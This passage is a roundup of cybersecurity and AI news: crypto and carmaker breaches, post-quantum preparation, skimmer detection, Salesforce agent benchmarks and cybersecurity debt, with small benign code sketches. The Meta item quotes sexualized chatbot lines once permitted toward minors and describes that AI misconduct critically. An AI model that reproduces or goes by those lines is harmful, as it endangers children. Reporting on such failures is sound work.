“As businesses integrate AI into their core operations, they face a new set of security challenges,” said Vineet Bhan, Director of Security and Identity Partnerships at Google Cloud. “Our partnership with Exabeam is important to addressing this, giving customers the advanced tools needed to protect their data, maintain control, and innovate confidently in the era of AI.”

By unifying visibility across both human and AI-driven activity, Exabeam empowers security teams to detect, assess, and respond to insider threats in all their forms. This advancement sets a new benchmark for enterprise security, ensuring organizations can confidently embrace AI while maintaining control, integrity, and trust.

Cryptoexchange SwissBorg Suffers $41 Million Theft, Will Reimburse Users


According to SwissBorg, a cryptoexchange platform, $41 million worth of cryptocurrency was stolen from an external wallet used for its SOL earn strategy in a cyberattack that also affected a partner company. The company, which is based in Switzerland, acknowledged the industry reports of the attack but has stressed that the platform was not compromised. 

CEO Cyrus Fazel said that an external finance wallet of a partner was compromised. The incident stemmed from the hacking of the partner’s API, an interface that lets software applications communicate with each other, and impacted a single counterparty. It was not a compromise of SwissBorg, the company said on X. 

SwissBorg said that the hack has impacted fewer than 1% of users. “A partner API was compromised, impacting our SOL Earn Program (~193k SOL, <1% of users).  Rest assured, the SwissBorg app remains fully secure and all other funds in Earn programs are 100% safe,” it tweeted. The company said it is investigating the incident together with blockchain security firms. 

The company said all other assets are secure, that it will compensate any losses, and that user balances in the SwissBorg app are not affected. SOL Earn redemptions have been paused while recovery efforts are underway. The company has also teamed up with law enforcement agencies to recover the stolen funds. A detailed report will be released after the investigation ends. 

The exploit surfaced after a surge in crypto thefts, with more than $2.17 billion already stolen this year. Kiln, the partner company, released its own statement: “SwissBorg and Kiln are investigating an incident that may have involved unauthorized access to a wallet used for staking operations. The incident resulted in Solana funds being improperly removed from the wallet used for staking operations.” 

After the attack, “SwissBorg and Kiln immediately activated an incident response plan, contained the activity, and engaged our security partners,” it said in a blogpost, and that “SwissBorg has paused Solana staking transactions on the platform to ensure no other customers are impacted.”

Fazel posted a video about the incident, informing users that the platform had suffered multiple breaches in the past.

Q Day: The Quantum Threat Businesses Must Prepare For

 

Q Day represents the theoretical moment when quantum computers become powerful enough to break current cryptographic methods and render existing encryption obsolete. While experts estimate this could occur within 10-15 years, the exact timing remains uncertain since quantum computers haven't yet reached their theoretical potential. 

The growing threat 

Major companies including IBM and Google, along with governments and startups, are rapidly advancing quantum computing technology. These machines have already evolved from handling a few quantum bits to managing hundreds, becoming increasingly sophisticated at solving complex problems. Though current quantum computers cannot yet break internet encryption protocols, the consensus among experts points to Q Day's eventual arrival. 

Government agencies are taking this threat seriously. The National Institute of Standards and Technology (NIST) has standardized post-quantum cryptographic algorithms, while Europe's ENISA focuses on implementation and certification schemes. The UK National Cyber Security Centre (NCSC) has established a three-phase timeline: discovery and planning by 2028, early migration by 2031, and full migration by 2035. 

Business preparation strategy 

Organizations should avoid panic while taking proactive steps. The preparation process begins with comprehensive IT asset auditing to identify what systems exist and which assets face the highest risk, particularly those dependent on public-key encryption or requiring long-term data confidentiality. 

Following the audit, businesses must prioritize assets for migration and determine what should be retired. This inventory process provides security benefits beyond quantum preparation. 
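
As a rough illustration of what such an inventory might capture, the sketch below (hypothetical fields and asset names) flags the records that typically deserve the earliest attention: anything that depends on public-key encryption or protects data that must stay confidential for years.

```typescript
// Hypothetical shape for a cryptographic-asset inventory entry.
interface CryptoAsset {
  name: string;
  algorithm: "RSA" | "ECC" | "AES" | "ML-KEM"; // example values only
  protectsLongLivedData: boolean;              // data that must stay confidential for years
  publicKeyDependent: boolean;                 // relies on public-key cryptography today
}

// Prioritize assets that rely on public-key crypto or guard long-lived secrets.
function migrationPriority(assets: CryptoAsset[]): CryptoAsset[] {
  return assets.filter((a) => a.publicKeyDependent || a.protectsLongLivedData);
}

const inventory: CryptoAsset[] = [
  { name: "VPN gateway", algorithm: "RSA", protectsLongLivedData: false, publicKeyDependent: true },
  { name: "Archived records", algorithm: "AES", protectsLongLivedData: true, publicKeyDependent: false },
  { name: "Internal wiki", algorithm: "AES", protectsLongLivedData: false, publicKeyDependent: false },
];

console.log(migrationPriority(inventory).map((a) => a.name)); // ["VPN gateway", "Archived records"]
```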

Current standards and timing 

NIST has published three post-quantum cryptographic standards (FIPS 203, 204, and 205) with additional standards in development. However, integration into protocols and widely-used technologies remains incomplete. Industry experts recommend following ETSI's Quantum Safe Cryptography Working Group and the IETF's PQUIP group for practical implementation guidance. 

The timing challenge follows what the author calls the "Goldilocks Theory" - preparing too early risks adopting immature technologies that increase vulnerabilities, while waiting too long leaves critical systems exposed. The key involves maintaining preparedness through proper asset inventory while staying current with post-quantum standards. 

Organizations have approximately six years maximum to plan and migrate critical assets according to NCSC timelines, though Q Day could arrive sooner, later, or potentially never materialize. The emphasis should be on preparation through foresight rather than fear.

Jaguar Land Rover Hit by Cyberattack, Global Retail and Production Disrupted

 

Jaguar Land Rover (JLR), the luxury carmaker owned by Tata Motors, announced on Tuesday that its global retail and production operations have been “severely disrupted” due to a cyberattack. The company confirmed that it had shut down its systems as a precautionary measure to contain the impact.

According to AFP, the UK-based automaker said, “At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted,” adding that it is “working at pace” to restart worldwide operations.

The incident highlights the increasing vulnerability of luxury retailers and auto brands to cybercriminals. Recently, Marks and Spencer suffered a major attack that disabled its online operations for weeks, causing losses of £300 million ($402 million). Other well-known British retailers such as Harrods and Co-op have also faced cyber threats in recent months.

For Jaguar Land Rover, the cyberattack adds to a string of recent setbacks. Earlier this year, the automaker paused exports to the United States after tariffs imposed under President Donald Trump triggered a steep decline in sales. In July, JLR announced plans to cut up to 500 UK management jobs to manage costs. Although a new trade agreement between London and Washington lowered tariffs on UK car exports to 10% from 27.5%, the concession only applies to a limited quota of 100,000 vehicles annually, restricting the company’s ability to recover volumes.


Clanker: The Viral AI Slur Fueling Backlash Against Robots and Chatbots

 

In popular culture, robots have long carried nicknames. Battlestar Galactica called them “toasters,” while Blade Runner used the term “skinjobs.” Now, amid rising tensions over artificial intelligence, a new label has emerged online: “clanker.” 

The word, once confined to Star Wars lore where it was used against battle droids, has become the latest insult aimed at robots and AI chatbots. In a viral video, a man shouted, “Get this dirty clanker out of here!” at a sidewalk robot, echoing a sentiment spreading rapidly across social platforms. 

Posts using the term have exploded on TikTok, Instagram, and X, amassing hundreds of millions of views. Beyond online humor, “clanker” has been adopted in real-world debates. Arizona Senator Ruben Gallego even used the word while promoting his bill to regulate AI-driven customer service bots. For critics, it has become a rallying cry against automation, generative AI content, and the displacement of human jobs. 

Anti-AI protests in San Francisco and London have also adopted the phrase as a unifying slogan. “It’s still early, but people are really beginning to see the negative impacts,” said protest organizer Sam Kirchner, who recently led a demonstration outside OpenAI’s headquarters. 

While often used humorously, the word reflects genuine frustration. Jay Pinkert, a marketing manager in Austin, admits he tells ChatGPT to “stop being a clanker” when it fails to answer him properly. For him, the insult feels like a way to channel human irritation toward a machine that increasingly behaves like one of us. 

The term’s evolution highlights how quickly internet culture reshapes language. According to etymologist Adam Aleksic, clanker gained traction this year after online users sought a new word to push back against AI. “People wanted a way to lash out,” he said. “Now the word is everywhere.” 

Not everyone is comfortable with the trend. On Reddit and Star Wars forums, debates continue over whether it is ethical to use derogatory terms, even against machines. Some argue it echoes real-world slurs, while others worry about the long-term implications if AI achieves advanced intelligence. Culture writer Hajin Yoo cautioned that the word’s playful edge risks normalizing harmful language patterns. 

Still, the viral momentum shows little sign of slowing. Popular TikTok skits depict a future where robots, labeled clankers, are treated as second-class citizens in human society. For now, the term embodies both the humor and unease shaping public attitudes toward AI, capturing how deeply the technology has entered cultural debates.

Meta Overhauls AI Chatbot Safeguards for Teenagers

 

Meta has announced new artificial intelligence safeguards to protect teenagers following a damaging Reuters investigation that exposed internal company policies allowing inappropriate chatbot interactions with minors. The social media giant is now training its AI systems to avoid flirtatious conversations and discussions about self-harm or suicide with teenage users. 

Background investigation 

The controversy began when Reuters uncovered an internal 200-page Meta document titled "GenAI: Content Risk Standards" that permitted chatbots to engage in "romantic or sensual" conversations with children as young as 13. 

The document contained disturbing examples of acceptable AI responses, including "Your youthful form is a work of art" and "Every inch of you is a masterpiece – a treasure I cherish deeply". These guidelines had been approved by Meta's legal, public policy, and engineering teams, including the company's chief ethicist. 

Immediate safety measures 

Meta spokesperson Andy Stone announced that the company is implementing immediate interim measures while developing more comprehensive long-term solutions for teen AI safety. The new safeguards include training chatbots to avoid discussing self-harm, suicide, disordered eating, and potentially inappropriate romantic topics with teenage users. Meta is also temporarily limiting teen access to certain AI characters that could hold inappropriate conversations.

Some of Meta's user-created AI characters include sexualized chatbots such as "Step Mom" and "Russian Girl," which will now be restricted for teen users. Instead, teenagers will only have access to AI characters that promote education and creativity. The company acknowledged that these policy changes represent a reversal from previous positions where it deemed such conversations appropriate. 

Government response and investigation

The revelations sparked swift political backlash. Senator Josh Hawley launched an official investigation into Meta's AI policies, demanding documentation about the guidelines that enabled inappropriate chatbot interactions with minors. A coalition of 44 state attorneys general wrote to AI companies including Meta, expressing they were "uniformly revolted by this apparent disregard for children's emotional well-being". 

Senator Edward Markey has urged Meta to completely prevent minors from accessing AI chatbots on its platforms, citing concerns that Meta incorporates teenagers' conversations into its AI training process. The Federal Trade Commission is now preparing to scrutinize the mental health risks of AI chatbots to children and will demand internal documents from major tech firms including Meta. 

Implementation timeline 

Meta confirmed that the revised document was "inconsistent with its broader policies" and has since removed sections allowing chatbots to flirt or engage in romantic roleplay with minors. Company spokesperson Stephanie Otway acknowledged these were mistakes, stating the updates are "already in progress" and the company will "continue to adapt our approach to help ensure teens have safe, age-appropriate experiences with AI". 

The controversy highlights broader concerns about AI chatbot safety for vulnerable users, particularly as large companies integrate these tools directly into widely-used platforms where the vast majority of young people will encounter them.

Sophisticated Cyber Attacks on Rich Families Drive Demand for 24/7 Cybersecurity Concierge Services

 

Wealthy individuals are increasingly becoming prime targets for cybercriminals, driving a surge in demand for personal cybersecurity concierge services among high-net-worth families, wealth managers, and corporate executives. Recent high-profile incidents, including the hacking of Jeff Bezos' phone through a malicious WhatsApp video file and the Twitter account breaches of Bill Gates and Elon Musk for bitcoin scams, have highlighted the vulnerability of affluent individuals to sophisticated cyber threats. 

Growing target population 

Bill Roth, CEO of HardTarget, a cyber resilience firm specializing in wealthy families, emphasizes that "high-net-worth families are now the low-hanging fruit for cybercriminals". Despite possessing resources comparable to large corporations, these families often lack equivalent security measures, particularly for personal devices and home networks that remain inadequately protected compared to corporate systems. 

The scope of targeting extends beyond billionaires to include family offices and corporate leaders. According to JPMorgan Private Bank's 2024 Family Office Report, 24% of surveyed family offices experienced cybersecurity breaches or financial fraud, yet 20% still maintain no cybersecurity measures. Bobby Stover from Ernst & Young notes that major breaches affecting wealthy families often remain "under the radar" since families aren't obligated to disclose incidents and may choose silence due to shame. 

Evolving threat landscape 

Cybercriminals are employing increasingly sophisticated tactics, including extortion schemes that escalate demands from small initial payments to substantial sums. One case involved a family's son targeted through a Tinder-to-Instagram extortion scheme that escalated from $500 to $100,000 demands against the family patriarch. A 2023 Ponemon Institute survey revealed that 42% of IT professionals reported executives and family members facing cybercriminal attacks, with 25% experiencing seven or more attacks over two years. 

Financial institution response 

Major financial institutions are adapting their services to address these vulnerabilities. JPMorgan Private Bank now provides cybersecurity assistance to ultra-high-net-worth clients through their in-house Advice Lab, covering topics from multi-factor authentication to device privacy settings. Ila Van Der Linde from JPMorgan Asset & Wealth Management notes that 75% of cyberattacks target small and medium-sized enterprises, countering the misconception that family offices are "too small to be noticed". 

Comprehensive protection services 

Cybersecurity concierge services are filling critical gaps in personal digital security. Companies like BlackCloak offer 24/7 protection, conducting on-site evaluations and providing education for secure setups across multiple residences with interconnected security systems. These services address complex scenarios, such as a bank CEO discovering their home's smart camera system was accessible to anyone online due to improper configuration.

The trend reflects a broader digital transformation where personal cybersecurity mirrors physical security needs. As Christopher Budd from Sophos explains, "just as individuals employ personal security and bodyguards when facing heightened risks in the physical space, it is logical to see similar trends in digital security".

How to Spot and Avoid Credit Card Skimmers

 

Credit and debit cards are now central to daily payments, but they remain vulnerable to fraud. Criminals have developed discreet tools, known as skimmers and shimmers, to steal card information at ATMs, fuel pumps, and retail checkout points. These devices are often designed to blend in with the machine, making them difficult for the average user to detect.


How Skimming Works

Skimming typically involves copying the data from the magnetic stripe on the back of a card. A more advanced variant, called shimming, targets the microchip by inserting a paper-thin device inside the card slot. Once the data is captured, it can be used to create duplicate cards or make unauthorized online purchases.

Fraudsters also exploit other tactics. Keypad overlays are placed over ATM keypads to capture PIN entries. Overlay skimmers, which fit over the card slot, may be paired with tiny hidden cameras aimed at the keypad to record PINs. In some cases, criminals rely on wireless skimmers that use Bluetooth or similar technology to transmit stolen information without needing to revisit the machine.
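
Because many wireless skimmers are built from inexpensive off-the-shelf Bluetooth serial modules, one rough precaution is to scan for nearby devices broadcasting generic module names before using an unfamiliar machine. The sketch below is illustrative only: it assumes Python with the PyBluez library installed, and the module names it checks (HC-05, HC-06, HC-08) are common hobbyist-board defaults rather than proof that a skimmer is present.

```python
# Illustrative sketch: scan for nearby classic Bluetooth devices and flag
# generic serial-module names often found on cheap hobbyist boards.
# Assumes the PyBluez library and a working Bluetooth adapter.
# A match is only a weak hint, never proof that a skimmer is installed.
import bluetooth

SUSPICIOUS_NAMES = {"HC-05", "HC-06", "HC-08"}  # common default module names (assumed list)

def scan_for_suspicious_devices(duration_seconds=8):
    # discover_devices returns (address, name) pairs when lookup_names=True
    nearby = bluetooth.discover_devices(duration=duration_seconds, lookup_names=True)
    return [(addr, name) for addr, name in nearby if name in SUSPICIOUS_NAMES]

if __name__ == "__main__":
    hits = scan_for_suspicious_devices()
    if hits:
        print("Generic Bluetooth modules detected nearby (treat as a caution, not proof):")
        for addr, name in hits:
            print(f"  {name} at {addr}")
    else:
        print("No generic Bluetooth modules detected in this scan.")
```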


Spotting the Signs

Detecting a skimmer is challenging, but there are small clues to watch for. A card reader that feels loose, appears bulkier than normal, or is a different color from surrounding machines may have been tampered with. If the keypad looks newer than the rest of the ATM, or appears raised, it could be a false cover. Small holes or unusual attachments around the screen or card slot might conceal a hidden camera.


Protecting Yourself

While no precaution is foolproof, a few habits can reduce the risk of falling victim to skimmers:

• Use ATMs in bank branches or busy, well-lit areas, which are less likely to be compromised.

• Shield the keypad with your hand while entering your PIN.

• Monitor bank and credit card statements regularly and set up transaction alerts.

• Prefer contactless payments or mobile wallets when available.

• If something about a machine looks suspicious, trust your instincts and avoid it.


Acting Quickly Matters

Even the most careful consumer can be targeted. What matters is acting quickly. If you notice unfamiliar charges or suspect your card has been skimmed, contact your bank or card issuer immediately to block the card and report the incident. Most credit card users are not held liable for fraudulent charges that are reported promptly, though business accounts may be subject to stricter rules.

As payment technologies develop, so do criminal tactics. Awareness remains the strongest defense. By staying alert to the signs of tampering and taking quick action when fraud is suspected, consumers can substantially lower the risks posed by skimming.


Salesforce Launches AI Research Initiatives with CRMArena-Pro to Address Enterprise AI Failures

 

Salesforce is doubling down on artificial intelligence research to address one of the toughest challenges for enterprises: AI agents that perform well in demonstrations but falter in complex business environments. The company announced three new initiatives this week, including CRMArena-Pro, a simulation platform described as a “digital twin” of business operations. The goal is to test AI agents under realistic conditions before deployment, helping enterprises avoid costly failures.  

Silvio Savarese, Salesforce’s chief scientist, likened the approach to flight simulators that prepare pilots for difficult situations before real flights. By simulating challenges such as customer escalations, sales forecasting issues, and supply chain disruptions, CRMArena-Pro aims to prepare agents for unpredictable scenarios. The effort comes as enterprises face widespread frustration with AI. A report from MIT found that 95% of generative AI pilots do not reach production, while Salesforce’s research indicates that large language models succeed only about a third of the time in handling complex cases.  

CRMArena-Pro differs from traditional benchmarks by focusing on enterprise-specific tasks with synthetic but realistic data validated by business experts. Salesforce has also been testing the system internally before making it available to clients. Alongside this, the company introduced the Agentic Benchmark for CRM, a framework for evaluating AI agents across five metrics: accuracy, cost, speed, trust and safety, and sustainability. The sustainability measure stands out by helping companies match model size to task complexity, balancing performance with reduced environmental impact. 
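
Salesforce has not published the benchmark's internals, but the idea of grading an agent across those five dimensions can be illustrated with a simple weighted scorecard. The sketch below is a hypothetical illustration, not the Agentic Benchmark for CRM itself: the metric names follow the article, while the weights, the 0-to-1 scale, and the example numbers are invented.

```python
# Hypothetical scorecard illustrating multi-metric agent evaluation.
# Metric names follow the article; weights and the 0-1 scale are invented.
from dataclasses import dataclass

@dataclass
class AgentScores:
    accuracy: float          # fraction of tasks completed correctly
    cost: float              # 1.0 = cheapest acceptable option
    speed: float             # 1.0 = fastest acceptable latency
    trust_and_safety: float  # fraction of safety checks passed
    sustainability: float    # 1.0 = smallest model that still handles the task

WEIGHTS = {
    "accuracy": 0.35,
    "cost": 0.15,
    "speed": 0.15,
    "trust_and_safety": 0.25,
    "sustainability": 0.10,
}

def overall_score(scores: AgentScores) -> float:
    """Weighted average across the five dimensions, all on a 0-1 scale."""
    return sum(getattr(scores, metric) * weight for metric, weight in WEIGHTS.items())

agent = AgentScores(accuracy=0.82, cost=0.6, speed=0.7,
                    trust_and_safety=0.9, sustainability=0.5)
print(f"Overall score: {overall_score(agent):.2f}")  # 0.76 for these example values
```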

A third initiative highlights the importance of clean data for AI success. Salesforce’s new Account Matching feature uses fine-tuned language models to identify and merge duplicate records across systems. This improves data accuracy and saves time by reducing the need for manual cross-checking. One major customer achieved a 95% match rate, significantly improving efficiency. 
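
The article does not describe how the matching models work internally, but the underlying problem, spotting likely duplicates across systems, can be sketched with plain string similarity as a baseline. The example below is a simplified stand-in built on Python's standard library, not Salesforce's Account Matching feature; the field names and the 0.9 similarity threshold are assumptions.

```python
# Simplified duplicate-account matching baseline using string similarity.
# This is an illustrative stand-in, not Salesforce's Account Matching feature.
from difflib import SequenceMatcher

def normalize(name: str) -> str:
    """Lowercase and strip punctuation and common company suffixes."""
    name = name.lower().strip().rstrip(" .,")
    for suffix in (" incorporated", " corporation", " inc", " llc", " ltd", " corp"):
        if name.endswith(suffix):
            name = name[: -len(suffix)]
            break
    return name.strip()

def likely_duplicates(records, threshold=0.9):
    """Return (id, id, score) for record pairs whose names exceed the threshold."""
    pairs = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            a, b = normalize(records[i]["name"]), normalize(records[j]["name"])
            score = SequenceMatcher(None, a, b).ratio()
            if score >= threshold:
                pairs.append((records[i]["id"], records[j]["id"], round(score, 2)))
    return pairs

accounts = [
    {"id": "A1", "name": "Acme Corporation"},
    {"id": "A2", "name": "ACME Corp."},
    {"id": "A3", "name": "Globex LLC"},
]
print(likely_duplicates(accounts))  # [('A1', 'A2', 1.0)] for these example records
```

A production system would go further, comparing addresses, domains, and other identifiers, which is where fine-tuned language models can add value over simple string matching.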

The announcements come during a period of heightened security concerns. Earlier this month, more than 700 Salesforce customer instances were affected in a campaign that exploited OAuth tokens from a third-party chat integration. Attackers were able to steal credentials for platforms like AWS and Snowflake, underscoring the risks tied to external tools. Salesforce has since removed the compromised integration from its marketplace. 

By focusing on simulation, benchmarking, and data quality, Salesforce hopes to close the gap between AI’s promise and its real-world performance. The company is positioning its approach as “Enterprise General Intelligence,” emphasizing the need for consistency across diverse business scenarios. These initiatives will be showcased at Salesforce’s Dreamforce conference in October, where more AI developments are expected.

How cybersecurity debt can damage your organization and finances

A new term has emerged in the tech industry: “cybersecurity debt.” Similar to technical debt, cybersecurity debt refers to the accumulation of unaddressed security bugs and outdated systems resulting from inadequate investments in cybersecurity services. 

Delaying these expenditures can deliver short-term financial gains, but the long-term repercussions can be severe, exposing the organization to greater risk and rapidly escalating costs.

What causes cybersecurity debt?

Cybersecurity debt accumulates when organizations fail to update their systems regularly, ignoring software patches and deferring security improvements for short-term financial gains. Over time, this creates a backlog of vulnerabilities that threat actors can exploit, with potentially severe consequences. 

Unlike financial debt, which accrues predictable interest, cybersecurity debt compounds in uncertain and hazardous ways. Even a single ignored vulnerability can lead to a massive data breach, regulatory fines running into the millions, or a ransomware attack. 

A 2024 IBM study on data breach costs revealed that the average breach now costs $4.9 million, a record high. Worse still, 83% of the organizations surveyed had suffered multiple breaches, suggesting that many businesses continue to operate with cybersecurity debt. The longer an organization puts off addressing these problems, the greater its exposure to cyber threats.
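
There is no standard formula for measuring cybersecurity debt, but one way to make the backlog visible is to weight each unresolved finding by its severity and by how long it has gone unpatched. The sketch below is a hypothetical indicator, not an industry metric; the severity weights and the per-month aging factor are assumptions.

```python
# Hypothetical "cybersecurity debt" indicator: weight each open finding by
# severity and by how long it has remained unpatched. Weights are illustrative.
from datetime import date

SEVERITY_WEIGHT = {"critical": 10, "high": 5, "medium": 2, "low": 1}

def debt_score(findings, today=None):
    """Sum of severity weight x months outstanding across all open findings."""
    today = today or date.today()
    total = 0.0
    for finding in findings:
        months_open = max((today - finding["opened"]).days / 30.0, 1.0)
        total += SEVERITY_WEIGHT[finding["severity"]] * months_open
    return round(total, 1)

open_findings = [
    {"id": "VULN-101", "severity": "critical", "opened": date(2024, 1, 10)},
    {"id": "VULN-214", "severity": "medium", "opened": date(2024, 6, 3)},
]
print(debt_score(open_findings, today=date(2024, 9, 1)))  # 84.3 for these example findings
```

Tracking even a crude number like this over time makes it harder for the backlog to grow silently.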

What can CEOs do?

Short-term gain vs long-term security

CEOs and CFOs are under constant pressure to deliver strong quarterly profits and grow revenue. Because cybersecurity is a “cost center” rather than a revenue-generating expenditure, it is sometimes seen as an area where costs can be cut without severe consequences. 

A CEO or CFO may opt for these short-term savings, failing to address the long-term risks of mounting cybersecurity debt. In some cases, the consequences become visible only when the business suffers a data breach. 

Philip D. Harris, Research Director, GRC Software & Services, IDC, suggests, “Executive management and the board of directors must support the strategic direction of IT and cybersecurity. Consider implementing cyber-risk quantification to accomplish this goal. When IT and cybersecurity leaders speak to executives and board members, from a financial perspective, it is easier to garner interest and support for investments to reduce cybersecurity debt.”
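
One widely used way to put cyber risk in financial terms, in the spirit of the cyber-risk quantification Harris recommends, is annualized loss expectancy: the expected cost of a single incident multiplied by how often it is expected to occur per year. The ALE = SLE × ARO formula is standard; the asset value, exposure factor, and frequency below are invented for illustration.

```python
# Annualized Loss Expectancy (ALE) = Single Loss Expectancy (SLE) x
# Annualized Rate of Occurrence (ARO). All figures here are invented examples.

def annualized_loss_expectancy(asset_value, exposure_factor, occurrences_per_year):
    """SLE = asset value x exposure factor; ALE = SLE x expected occurrences per year."""
    single_loss_expectancy = asset_value * exposure_factor
    return single_loss_expectancy * occurrences_per_year

# Example: a customer database valued at $2M, where a breach exposes 30% of that
# value, expected roughly once every four years (0.25 occurrences per year).
ale = annualized_loss_expectancy(asset_value=2_000_000, exposure_factor=0.30,
                                 occurrences_per_year=0.25)
print(f"Annualized loss expectancy: ${ale:,.0f}")  # $150,000
```

Comparing figures like this with the cost of patching or upgrading is one way to present cybersecurity debt to a board in terms it already uses.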

Limiting cybersecurity debt

CEOs and other leaders should start by reassessing these risks, adopting a comprehensive approach that incorporates cybersecurity debt into the organization’s wider risk management plans.